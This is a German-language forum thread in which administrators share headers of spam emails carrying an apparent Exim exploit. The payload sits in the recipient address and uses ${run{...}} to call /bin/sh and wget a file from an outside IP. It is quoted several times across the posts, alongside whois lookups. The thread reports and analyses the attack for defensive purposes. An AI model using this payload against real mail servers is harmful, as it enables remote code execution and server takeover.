Ergebnis 1 bis 3 von 3

Thema: Mail-Server Exploit per E-Mail

  1. #1
    Senior Mitglied
    Registriert seit
    25.03.2006
    Beiträge
    1.713

    Standard Mail-Server Exploit per E-Mail

    Gerade ist eine vermutlich an root@localhost gerichtete E-Mail auf einem von mir betreuten Server eingegangen, die aus folgendem Quelltext besteht:


    header:
    01: Return-Path: <support [at] service.com>
    02: Delivered-To: ???@???.de
    03: Received: by ???.de (Postfix)
    04: ID: [ID filtered]
    05: Delivered-To:
    06: root+${run{x2fbinx2fsht-ctx22wgetx20213.227.155.101x2ftmpx2f[IP-Adresse des angegriffenen
    07: Servers]x22}}@localhost
    08: Received: from service.com (unknown [46.101.19.140])
    09: by ???.de (Postfix) with SMTP ID: [ID filtered]
    10: Tue, 18 Jun 2019 xx:xx:xx +0200 (CEST)
    11: Received: 1
    12: Received: 2
    13: Received: 3
    14: Received: 4
    15: Received: 5
    16: Received: 6
    17: Received: 7
    18: Received: 8
    19: Received: 9
    20: Received: 10
    21: Received: 11
    22: Received: 12
    23: Received: 13
    24: Received: 14
    25: Received: 15
    26: Received: 16
    27: Received: 17
    28: Received: 18
    29: Received: 19
    30: Received: 20
    31: Received: 21
    32: Received: 22
    33: Received: 23
    34: Received: 24
    35: Received: 25
    36: Received: 26
    37: Received: 27
    38: Received: 28
    39: Received: 29
    40: Received: 30
    41: Received: 31

    Interessant ist vor allem dieser Code:

    Code:
    root+${run{x2fbinx2fsht-ctx22wgetx20213.227.155.101x2ftmpx2f[IP-Adresse des angegriffenen Servers]x22}}@localhost
    Es soll offenbar von whois: [Link nur für registrierte Mitglieder sichtbar. ] etwas nachgeladen und dann ausgeführt werden.

    Der Exploit ist wohl für den Mailserver Exim vorgesehen (bei uns ist der nicht im Einsatz), wenn ich die Google-Ergebnisse richtig deute (Suche nach x2fbinx2fsht). Es könnte sich um das Ausnutzen [Link nur für registrierte Mitglieder sichtbar. ] handeln.
    Geändert von Gerlach (18.06.2019 um 23:44 Uhr)

  2. #2
    Neues Mitglied
    Registriert seit
    19.06.2019
    Beiträge
    1

    Standard

    Hallo,

    bei mir wurde dieselbe "Attacke" durchgeführt:


    header:
    01: Return-Path: <support [at] service.com>
    02: Delivered-To: poor [at] spamvictim.tld
    03: Received: from localhost (localhost [127.0.0.1])
    04: by xx.com (Postfix) with ESMTP ID: [ID filtered]
    05: for
    06: <root+${run{x2Fbinx2Fsht-ctx22wgetx20213.227.155.101x2ftmpx2f2.59.132.181x22}}@xx.com>;
    07: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    08: X-Quarantine-ID: [ID filtered]
    09: X-Virus-Scanned: Debian amavisd-new at xx.com
    10: X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date"
    11: X-Spam-Flag: YES
    12: X-Spam-Score: 12.981
    13: X-Spam-Level: ************
    14: X-Spam-Status: Yes, score=12.981 tagged_above=1 required=4.5
    15: tests=[EMPTY_MESSAGE=2.344, MISSING_DATE=1.396, MISSING_FROM=1,
    16: MISSING_HEADERS=1.207, MISSING_MID=0.14, MISSING_SUBJECT=1.767,
    17: PYZOR_CHECK=1.985, RDNS_NONE=1.274, SPF_HELO_SOFTFAIL=0.896,
    18: SPF_SOFTFAIL=0.972] autolearn=no autolearn_force=no
    19: Subject: ***SPAM***
    20: Received: from xx.com ([127.0.0.1])
    21: by localhost (xx.com [127.0.0.1]) (amavisd-new, port 10024)
    22: with ESMTP ID: [ID filtered]
    23: Received: from service.com (unknown [68.183.4.19])
    24: by xx.com (Postfix) with SMTP ID: [ID filtered]
    25: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    26: Received: 1
    27: Received: 2
    28: Received: 3
    29: Received: 4
    30: Received: 5
    31: Received: 6
    32: Received: 7
    33: Received: 8
    34: Received: 9
    35: Received: 10
    36: Received: 11
    37: Received: 12
    38: Received: 13
    39: Received: 14
    40: Received: 15
    41: Received: 16
    42: Received: 17
    43: Received: 18
    44: Received: 19
    45: Received: 20
    46: Received: 21
    47: Received: 22
    48: Received: 23
    49: Received: 24
    50: Received: 25
    51: Received: 26
    52: Received: 27
    53: Received: 28
    54: Received: 29
    55: Received: 30
    56: Received: 31
    57: Message-ID: [ID filtered]
    58: Date: Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    59: From: support [at] service.com

    Haben ebenfalls kein Exim im Einsatz. 68.183.4.19 ist per web erreichbar, wurde vielleicht sein Mail Server gehackt?
    Geändert von cmds (19.06.2019 um 14:52 Uhr) Grund: Header Tag gesetzt

  3. #3
    Urinstein Avatar von schara56
    Registriert seit
    03.08.2005
    Ort
    zuhause
    Beiträge
    10.602

    Standard

    Code:
    23: Received: from service.com (unknown [68.183.4.19])
    24:     by xx.com (Postfix) with SMTP ID: [ID filtered]
    25:     Wed, 19 Jun 2019 xx:xx:xx +0200 (CEST)
    Warum wundert mich das nun nicht?
    Code:
    NetRange:       68.183.0.0 - 68.183.255.255
    CIDR:           68.183.0.0/16
    NetName:        DO-13
    NetHandle:      NET-68-183-0-0-1
    Parent:         NET68 (NET-68-0-0-0-0)
    NetType:        Direct Allocation
    OriginAS:       
    Organization:   DigitalOcean, LLC (DO-13)
    RegDate:        2018-09-18
    Updated:        2018-09-13
    Ref:            https://rdap.arin.net/registry/ip/68.183.0.0
    Villains who twirl their mustaches are easy to spot.
    Those who cloak themselves in good deeds are well camouflaged.

    Sokath! His eyes uncovered!

Lesezeichen

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •  
Partnerlink:
REDDOXX Anti-Spam Lösungen